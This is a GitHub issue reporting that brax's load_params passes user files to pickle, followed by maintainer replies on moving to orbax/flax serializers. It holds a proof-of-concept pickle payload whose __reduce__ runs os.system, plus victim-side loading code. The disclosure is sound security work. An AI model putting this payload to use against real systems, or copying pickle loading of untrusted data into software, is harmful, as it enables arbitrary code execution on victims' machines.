brax icon indicating copy to clipboard operation
brax copied to clipboard

Insecure Deserialization attack on pickle.loads

Open omidxrz opened this issue 10 months ago • 2 comments

I noticed that there is a module named load_params that passes user input directly into pickle , which allows an attacker to execute system commands with insecure deserialization attack on the victim’s system.

Vulnerable Function

https://github.com/google/brax/blob/69637a359463738140c1b850f61ad0088a23538b/brax/io/model.py#L22

Exploit Code (Attacker Side):

import pickle
import os

class MaliciousCode:
    def __reduce__(self):
        return (os.system, ("ping 'google.com'",))

with open('malicious.pkl', 'wb') as f:
    pickle.dump(MaliciousCode(), f)

Exploit Code (Victim Side):

from brax.io import model
model.load_params("malicious.pkl")

omidxrz avatar Jan 08 '25 10:01 omidxrz

Acknowledged, this has been on our TODO for some time. I implemented orbax checkpointing in PPO https://github.com/google/brax/blob/d48b0b373a6478838eac325cadc6d8983837a968/brax/training/agents/ppo/train.py#L534 as a start. But a bigger refactor is needed to bubble up this kind of logic into load_params, since the target state needs to be provided AOT when loading the params.

The flax serializer has a similar requirement, the target needs to be defined AOT. The right thing to do is to perhaps nix model.load_params and save_params altogether, and rely entirely on a flax/nnx/orbax serializer (along with a model config to generate the target pytree).

Happy to review any PRs if someone wants to take a look.

btaba avatar Jan 20 '25 07:01 btaba

8526f9a64ee02010615a57a026a7b6aad05cbda0 starts to address this, but we likely won't fully deprecate brax.io.model for some time

btaba avatar Jan 31 '25 22:01 btaba